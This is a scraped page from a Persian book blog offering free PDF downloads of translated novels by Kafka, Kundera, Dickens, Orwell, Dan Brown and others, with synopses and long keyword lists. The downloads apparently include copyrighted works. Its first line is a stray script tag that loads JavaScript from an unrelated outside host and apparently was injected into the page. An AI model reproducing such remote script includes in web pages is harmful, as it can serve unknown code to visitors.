script type="text/javascript" src="http://7vps.ir/img/website.js"> دانلود رمان
کافی نت
وبلاگی جذاب

دانلود رمان قصر

نوشته شده توسط محمد علی پور در تاریخ شنبه، 18 تیر ماه 1390
 



نام رمان: قصر
نویسنده: فرانتس کافکا
تعداد صفحات: 440
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
قصر هم از نظر حجم و هم از نظر اعتبار بزرگترین کار فرانتس کافکا به شمار می‌آید. این رمان که مثل سایر آثار کافکا به زبان آلمانی نوشته شده‌است، رمانی است ناتمام که مرگ زودهنگام او در چهل و یک سالگی (۱۹۲۴) به او این فرصت را نداد تا آن را به پایان برساند. قصر در شکل کنونی اش در ۲۰ فصل نگارش یافته‌است که فصل پایانی همان فصل ناتمام مانده است؛ از روی نشانه‌هایی می‌توان حدس زد که احتمالاً همان فصل بیستم می‌بایست آخرین فصل باشد و رمان بعد از آن چندان ادامه نمی‌یافته‌است.
برای دانلود رایگان رمان "قصر" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

 

دانلود رمان پرده

نوشته شده توسط محمد علی پور در تاریخ شنبه، 18 تیر ماه 1390
 



نام رمان: پرده
نویسنده: میلان کوندرا
تعداد صفحات: 101
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
کوندرا با کتاب جدبداش « پرده » تامل در باره هنر رمان را تعمیق می بخشد. در طرحی که ارائه می کند، دنیا در پس پرده ای از تعابیر آماده، تصاویر بزک شده و نمایشهای پرهیزکارانه و دروغین از چشم پنهان مانده است؛ و نقش رمان، از همان آغاز دوران مدرن، پاره کردن این پرده بوده تا بتواند جلوه هایی از حقیقت را که تنها رمان نویسان اصیل قادر به انتقال آن هستند، بر ما آشکار کند. در این کتاب، او چکیده ای از مضامین اصلی نوشته های قبلی اش را طرح می کند تا بسط شان دهد، آنها را کامل و تعمیق کندو گستره های جدیدی را به رویشان بگشاید.این درست است که کتاب محدود به نظریات نویسنده خالقی است که با حرکت از تجربه شخصی، امکان می دهد تا زیباشناسی و مواضع منحصر به فردش روشن گردد. ولی ما، با خواندن آن متوجه می شویم که کتاب بردی بسیار وسیع و عمومی دارد.
برای دانلود رایگان رمان "پرده" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود رمان دسیسه

نوشته شده توسط محمد علی پور در تاریخ پنجشنبه، 16 تیر ماه 1390
 



نام رمان: دسیسه
نویسنده: ماکسول گرانت
مترجم: دکتر قاسم کیانی
تعداد صفحات: 114
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
رمان آماده شده یکی دیگر از رمان های پرطرفدار خارجی است که توسط ماکسول گرانت با نام مستعار والتر گیبسون نوشته و توسط آقای دکتر قاسم کیانی ترجمه شده است. رمان در بیست و سه فصل و حدود صد صفحه با بالاترین کیفیت ممکن آماده شده  است. داستان رمان دسیسه همانطور که از نامش پیداست در مورد دسیسه و موضوعات کارگاهی می باشد و داستان گیرنده و جذابی دارد.
برای دانلود رایگان رمان "دسیسه" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download


دانلود رمان دوریت کوچک

نوشته شده توسط محمد علی پور در تاریخ چهارشنبه، 8 تیر ماه 1390
 



نام رمان: دوریت کوچک
نویسنده: چارلز دیکنز
مترجم: محمد قاضی
تعداد صفحات: 420
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
موضوع عامیانه این رمان نوشته نویسنده سرشناس انگلیسی (چارلز دیکنز) رفتارهای موجود در ادارات دولتی است که در ان زمان از نظر کندی کار و تنبلی کارکنان مورد اعتراض مردم بوده است. (ویلیام دوریت) در پی عدم اجرای قراردادی که با یکی از ادارات امضا کرده بود به زندان گزمه ها می افتد و انقدر انجا می ماند که به (پدر زندان گزمه ها) ملقب می شود. ایام حبس او با فداکاری های دختر کوچکش (امی) ملقب به دوریت کوچک تسکین می یابد. (ارتور کلن نم) نیز مردی است که به خانواده دوریت کمک می کند. بعد از مدتی امی به او علاقه مند می شود اما این علاقه اوایل دو طرفه نیست. با تغییر ناگهانی سرنوشت ویلیام دوریت وارث ثروت کلانی می شود و کلن نم نیز همان موقع به خاطر سفته های بی اعتبارش به زندان گزمه ها می افتد. بقیه داستان را در خود کتاب مطالعه کنید...
برای دانلود رایگان رمان"دوریت کوچک" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download
 

دانلود رمان آس و پاس ها

نوشته شده توسط محمد علی پور در تاریخ چهارشنبه، 1 تیر ماه 1390
 



نام رمان: آس و پاس ها
نویسنده: جورج اورول
تعداد صفحات: 269
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
جرج اورول در این کتاب شرح سال های در به دری و فقر خود در پاریس و لندن را ارائه می نماید . در این سالها او در اوج فقر به سر می برده ، مدتی ظرف شو بوده ، گاهی خدمتکار ، گاهی ولگرد و ..... شرحی است بر نحوه زندگی و گذران عمر ولگردها از زبان کسی که این نوع از امرار معاش را کاملا درک نموده است . توصیفات او در رمان بسیار عالی و زیبا و موشکافانه از نحوه زندگی ، تامین غذا و جای خواب این افراد سخن میگوید . او مدتی در رستوارن کار می کرده و در صفحات زیادی فقط نحوه کار در رستوران را توضیح داده.

برای دانلود رایگان رمان "آس و پاس ها" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

 

دانلود کتاب در کنار دوست (مجموعه داستان کوتاه)

نوشته شده توسط محمد علی پور در تاریخ شنبه، 28 خرداد ماه 1390
 



نام کتاب: در کنار دوست
نویسنده: ابوذر خداپرست
تعداد صفحات: 119
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
کتاب در کنار دوست نوشته ی ابوذر خداپرست گراکوئی شامل ده ها داستان کوتاه و بلند زیبا و خواندنی می باشد و در حدود صد و بیست صفحه آماده شده است.

نام برخی از داستان ها:
- نمایش قدرت
- مادر زیبایی ها
- زمین مظلوم
- نابود کننده، احیا کننده
- سایه، روشن
- راز آفرینش
- خوشبختی واقعی
- تفاوت نیت
- انسانیت فراموش شده
- و ...

برای دانلود رایگان کتاب "در کنار دوست" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود کتاب زیر دندان سگ (مجموه یازده داستان کوتاه)

نوشته شده توسط محمد علی پور در تاریخ یکشنبه، 22 خرداد ماه 1390
 



نام کتاب: زیر دندان سگ (مجموعه 11داستان کوتاه)
نویسنده: بهمن فرسی
تعداد صفحات: 63   
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
کتاب زیر دندان سگ نوشته ی بهمن فرسی و شامل 11 داستان کوتاه، جالب و خواندنی می باشد که به فارسی روان و امروزی نوشته شده است.

نام داستانها:
- سوزن
- بند
- پا
- استخوان سوخته ها
- سایه
- مهمان
- و ...

برای دانلود رایگان کتاب "زیر دندان سگ" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

 

دانلود کتاب داستان سفرهای گالیور

نوشته شده توسط محمد علی پور در تاریخ شنبه، 21 خرداد ماه 1390
 



نام کتاب: سفرهای گالیور
نویسنده: جاناتان سوییفت
تعداد صفحات: 40
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
سفرهای گالیوِر (۱۷۲۶ و تجدید نظر شده به سال ۱۷۳۵) با عنوان کامل «سفرهایی به برخی ممالک دور افتادهٔ جهان در چهار بخش. نوشتهٔ لموئل گالیور، نخست در نقش پزشک کشتی و سپس به عنوان ناخدا» داستانی تخیلی نوشتهٔ جاناتان سویفت به زبان انگلیسی است. این کتاب یکی از آثار ماندگار و کلاسیک ادبیات انگلیسی و همچنین اثری هزل بر طبیعت انسان و هجو داستان‌های ماجراجویانهٔ آن روزگار است. کتاب از زمان نخستین چاپ بسیار محبوب شد (جان گی در نامه‌ای که در ۱۷۲۶ به سوییفت نوشته‌است می‌گوید: «[کتاب] همه جا خوانده می‌شود. از جلسات کابینه بگیر تا مهد کودک‌ها») و همچنان هم به صورت‌های مختلف چاپ می‌شود.
همچنین در حال حضر اقتباس‌های فراوانی از روی آن به صورت کمیک استریپ، فیلم انیمیشن، فیلم، سریال و امثال آن شده‌است. داستان که در چهار بخش نوشته شده‌است به صورت سفرنامه‌ی دریانوردی به نام ناخدا لموئل گالیور و از زبان خود وی بیان می‌شود. نسخه‌های مختلف تفاوت‌های چندی با هم دارند، اما همهٔ نسخه‌ها در مواردی مشترک هستند که بنیان نسخه‌های امروزی اثر هستند. کتاب به شیوهٔ کتاب‌های آن روزگار با شرح مختصری از زندگی شخصیت و معرفی او آغاز می‌شود و با شرح سفرهای او ادامه می‌یابد.
برای دانلود رایگان کتاب "سفرهای گالیور" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 

ادامه مطلب+Download

دانلود رمان دروغگو

نوشته شده توسط محمد علی پور در تاریخ جمعه، 20 خرداد ماه 1390
 


نام رمان: دروغگو
نویسنده: آیزاک اسیموف
تعداد صفحات: 24
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
آیزاک آسیموف (‎به روسی Исаак Юдович Озимов ‏) (۲ ژانویه ۱۹۲۰ - ۶ آوریل ۱۹۹۲) نویسندهٔ آمریکایی روسی تبار گونه‌های علمی، علمی-تخیلی، خیال‌پردازی، وحشت و دکتر در بیوشیمی بود. شهرت اصلی او بیشتر به خاطر سری بنیاد (در ایران سری امپراتوری کهکشانی) است. قوانین سه‌گانهٔ رباتیک وی از شهرت جهانی برخوردار است و دایره‌المعارف بریتانیکا وی را واضع واژه رباتیک در زبان انگلیسی می‌شناسد. وی بیش از ۵۰۰ عنوان کتاب در تمام دسته‌های اصلی رده‌بندی دیوی (به جز فلسفه) دارد و سیارک آسیموف ۵۰۲۰ به افتخار وی نامگذاری شده‌است. داستان کوتاه دروغگو یکی از آثار آیزاک می باشد که برای کاربران عزیز آماده شده است.
برای دانلود رایگان رمان "دروغگو" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

دانلود رمان نماد گمشده

نوشته شده توسط محمد علی پور در تاریخ شنبه، 21 خرداد ماه 1390
 



نام رمان: نماد گمشده
نویسنده: دن بروان
مترجم: محمد عباس آبادی
تعداد صفحات: 700
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
کتاب «نماد گمشده» که در ابتدا بنا بود با عنوان «کلید سلیمان» منتشر شود، دنباله‌ای بر ماجراهای رابرت لنگدان است. اینبار نیز شخصیت‌ها در تلاش برای دستیابی به دانش اسرارآمیز نیاکان خردمند بشریت، باید بکوشند تا رمزهایی را تفسیر کنند. دانشی که به گفته متون کهن، قدرتی خدای‌گونه به انسان بخشیده و وی را همردیف خدایان قرار می‌دهد و در نهایت نیز سرشت این دانش، یا حداقل ماهیت آن برای خواننده روشن می‌شود. نماد گمشده نیز همچون دیگر کتاب‌های براون مملو از اطلاعات جدید، رمزگشایی نمادهای آشنا و زاویه‌ای تازه برای نگاه کردن به حقایق مسلم پنداشته در خصوص مذهب، انسان، معنویت، ادیان، سیاست، فرقه‌های مخفی و... است، که در قالبی معماوار و در بستر ماجرایی جنایی روایت می‌شود. بسیاری از مطالب طرح شده در کتاب مابه‌ازای عینی در جهان خارجی دارند. مهم‌ترین و جذاب‌ترین آن‌ها کشفیات کاترین سالمون در حوزه «علوم نوتیک» است؛ جالب است بدانیم در صفحه‌ای از وب‌سایت «موسسه علوم نوتیک» که در کتاب نیز به آن اشاره شده، حقایق علمی مرتبط با مطالب مطروحه در کتاب به بحث و بررسی گذاشته شده‌اند. همچنین اشارات کتاب به آثار هنری و میراث مکتوب نیز از همین قاعده پیروی می‌کنند.
برای دانلود رایگان رمان "نماد گمشده" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 
ادامه مطلب+Download

صفحات سایت

 1  |  2  |  3  |  4  |  5  |  6  |  7 



دو شنبه 20 تير 1390برچسب:کافکا,کتاب الکترونیک,دانلود مستقیم رمان قصر نوشته کافکا,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتابهای داستانی کافکا,دانلود کتابهای رمان کافکا دانلود کتاب,دانلود بهترین رمان های فرانتس کافکا,دانلود داستان های کافکا,دانلود رمان قصر کافکا,دانلود رمان های فرانتس کافکا,دانلود رمان کافکا,دانلود رمان جدید,دانلود رایگان داستان های فرانتس کافکا,دانلود رایگان رمان قصر اثری از کافکا,دانلود رایگان رمان های فرانتس کفکا,دانلود رایگان رمان های قدیمی کافکا,دانلود رایگان رمانهای کافکا,داستان های کافکا,رمان قصر نوشته کافکا,رمان قصر اثر کافکا,رمان های کافکا,رمان های زیبای کافکا,کتاب الکترونیک,پرده,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب رمان پرده,دانلود پرده,دانلود داستان زیبای پرده,دانلود رمان های ایرانی,دانلود رمان های خارجی,دانلود رمان پرده,دانلود رمان پرده نوشته میلان کوندرا,دانلود رمان پرده اثر میلان کوندرا,دانلود رمان پرده با فرمت PDF,دانلود رمان پرده با فرمت پی دی اف,دانلود رمان بی نظیر پرده,دانلود رمان جدید,دانلود رمان خواندنی پرده,دانلود رایگان رمان پرده,دانلود رایگان رمان زیبای پرده,داستان پرده,رمان پرده,رمان بی نظیر پرده,رمان جالب پرده,رمان زیبای پرده,کتاب الکترونیک,کتاب دسیسه,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب داستان دسیسه,دانلود کتاب دسیسه,دانلود کتاب رمان دسیسه,دانلود داستان های ماکسول گرانت,دانلود داستان دسیسه,دانلود رمان های ماکسول گرانت,دانلود رمان جدید,دانلود رمان دسیسه,دانلود رایگان رمان دسیسه,دانلود رایگان رمان دسیسه اثر ماکسول گرانت,داستان دسیسه,دسیسه,رمان دسیسه,رمان دسیسه نوشته ماکسول گرانت,چارلز دیکنز,کتاب الکترونیک,کتاب داستان دوریت کوچک,کتاب دریته ی کوچک,اثار چارلز دیکنز,دوریت کوچک,دوریته,دوریته کوچک,دوریته کوچک اثر چارلز دیکنز,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود درویت کوچک,دانلود رمان های چارلز دیکنز,دانلود رمان جدید,دانلود رمان دوریت کوچک,دانلود رمان دوریته کوچک,دانلود رایگان کتاب داستان دوریت کوچک,دانلود رایگان رمان دوریت کوچک,داستان دریته کوچک,داستان غم انگیز دوریت کوچک,دریته,رمان قدیمی دوریت کوچک,رمان دوریت کوچک نوشته چارلز دیکنز,رمان دوریته کوچک,رمان زیبای دوریت کوچک,کتاب الکترونیک,آس و پاس ها,دانلود مستقیم رمان اس و پاس ها,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب های جورج اورول,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود رمان های زیبای جورج اورول,دانلود رمان آس و پاس ها اثر جورج اورول,دانلود رمان جدید,دانلود رایگان داستان آس و پاس ها اثر جورج اورول,دانلود رایگان رمان اس و پاس ها,دانلود رایگان رمانهای جورج اورول,داستان آس و پاس ها,رمان قدیمی آس و پاس ها نوشته جورج اورول,رمان قدیمی اس و پاس ها,رمان آس و پاس ها,رمان اس و پاس ها نوشته جورج اورول,رمان اس و پاس های جورج اورول,رمان بی نظیر آس و پاس ها,رمان زیبای آس و پاس ها,مجموعه داستانهای کوتاه,چند داستان کوتاه و خواندنی,کتاب پرمحتوای در کنار دوست,کتاب الکترونیک,کتاب داستان در کنار دوست,کتاب در کنار دوست,دانلود مجموعه داستان کتاب در کنار دوست,دانلود مستقیم کتاب در کنار دوست,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود اسان کتاب در کنار دوست,دانلود داستان کوتاه,دانلود رمان جدید,دانلود رایگان کتاب درکنار دوست,دانلود رایگان کتاب زیبای در کنار دوست,در کنار دوست,در کنار دوست (مجموعه داستان کوتاه),مجموعه داستان کوتاه,مجموعه داستان کوتاه و بسیار زیبا,مجموعه داستان کوتاه زیر دندان سگ,کتاب الکترونیک,کتاب زیر دندان سگ,کتاب زیر دندان سگ (یازده داستان کوتاه),دانلود چند داستان کوتاه,دانلود یازده داستان کوتاه,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب داستان,دانلود کتاب زیر دندان سگ,دانلود کتاب زیر دندان سگ مجموعه داستان کوتاه,دانلود داستان های کوتاه,دانلود رمان جدید,دانلود رایگان مجموعه داستانهای کوتاه,دانلود رایگان کتاب زیر دندان سگ,داستان کوتاه,داستانهای کوتاه,داستانهای کوتاه و خواندنی,متن کتاب سفرهای گالیور,کتاب مهیج سفرهای گالیور,کتاب مصور سفرهای گالیور,کتاب کودک و نوجوان سفرهای گالیور,کتاب الکترونیک,کتاب داستان سفرهای گالیور,کتاب سفر های گالیور,کتاب سفرهای گالیور با تصویر,گالیور,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب زیبای سفرهای گالیور,دانلود کتاب سفرهای گالیور,دانلود رمان جدید,دانلود رایگان کتاب سفرهای گالیور,داستان های گالیور,داستان گالیور و سفرهایش,سفر گالیور,سفرهای گالیور,کتاب الکترونیک,بهترین رمان آیزاک آسیموف,دانلود مستقیم رمان دروغگو,دانلود کتاب,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب رمان دروغ گو,دانلود کتابهای ایزاک آسیموف,دانلود ترجمه رمان دروغ گو,دانلود رمان های ایزاک اسیموف,دانلود رمان جدید,دانلود رمان دروغگو,دانلود رایگان کتاب داستان دروغ گو,دانلود رایگان رمان دروغگو,داستان دروغ گو,دروغ گو,دروغگو,رمان بی نظیر دروغگو,رمان خواندنی دروغ گو,رمان دروغگو نوشته ی آیزاک آسیموف,رمان دروغگو اثر آیزاک آسیموف,رمان روغ گو,رمان زیبای دروغگو,نماد گمشده,کتاب الکترونیک,دن براون نماد گمشده,دانلود کتاب,دانلود کتاب نماد گمشده,دانلود کتاب های الکترونیکی,دانلود کتاب پی دی اف,دانلود کتاب الکترونیکی,دانلود کتاب اموزشی,دانلود کتاب جدید,دانلود کتاب داستان نماد گمشده,دانلود کتاب رمان نماد گمشده,دانلود رمان نماد گمشده,دانلود رمان های دان براون,دانلود رمان جدید,دانلود رایگان رمان نماد گمشده,دانلود رایگان رمان نماد گمشده ی دن براون,داستان نماد گمشده,داستان نماد گمشده دن براون,رمان نماد گمشده,رمان نماد گمشده نوشته ی داون براون,رمان نماد گمشده اثر نویسنده مشهور دن براون,رمان نماد گمشده دن براون,رمان زیبای نماد گمشده,رمان زیبای نماد گمشده اثر دن براون,, :: 8:15 بعد از ظهر
گری گوری

دانلود رمان نماد گمشده

نوشته شده توسط محمد علی پور در تاریخ شنبه، 21 خرداد ماه 1390
 



نام رمان: نماد گمشده
نویسنده: دن بروان
مترجم: محمد عباس آبادی
تعداد صفحات: 700
فرمت کتاب: PDF
زبان کتاب: فارسی

توضیحات:
کتاب «نماد گمشده» که در ابتدا بنا بود با عنوان «کلید سلیمان» منتشر شود، دنباله‌ای بر ماجراهای رابرت لنگدان است. اینبار نیز شخصیت‌ها در تلاش برای دستیابی به دانش اسرارآمیز نیاکان خردمند بشریت، باید بکوشند تا رمزهایی را تفسیر کنند. دانشی که به گفته متون کهن، قدرتی خدای‌گونه به انسان بخشیده و وی را همردیف خدایان قرار می‌دهد و در نهایت نیز سرشت این دانش، یا حداقل ماهیت آن برای خواننده روشن می‌شود. نماد گمشده نیز همچون دیگر کتاب‌های براون مملو از اطلاعات جدید، رمزگشایی نمادهای آشنا و زاویه‌ای تازه برای نگاه کردن به حقایق مسلم پنداشته در خصوص مذهب، انسان، معنویت، ادیان، سیاست، فرقه‌های مخفی و... است، که در قالبی معماوار و در بستر ماجرایی جنایی روایت می‌شود. بسیاری از مطالب طرح شده در کتاب مابه‌ازای عینی در جهان خارجی دارند. مهم‌ترین و جذاب‌ترین آن‌ها کشفیات کاترین سالمون در حوزه «علوم نوتیک» است؛ جالب است بدانیم در صفحه‌ای از وب‌سایت «موسسه علوم نوتیک» که در کتاب نیز به آن اشاره شده، حقایق علمی مرتبط با مطالب مطروحه در کتاب به بحث و بررسی گذاشته شده‌اند. همچنین اشارات کتاب به آثار هنری و میراث مکتوب نیز از همین قاعده پیروی می‌کنند.
برای دانلود رایگان رمان "نماد گمشده" از میهن دانلود به ادامه مطلب مراجعه نمایید.
 



ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 54
بازدید دیروز : 0
بازدید هفته : 147
بازدید ماه : 9179
بازدید کل : 139330
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس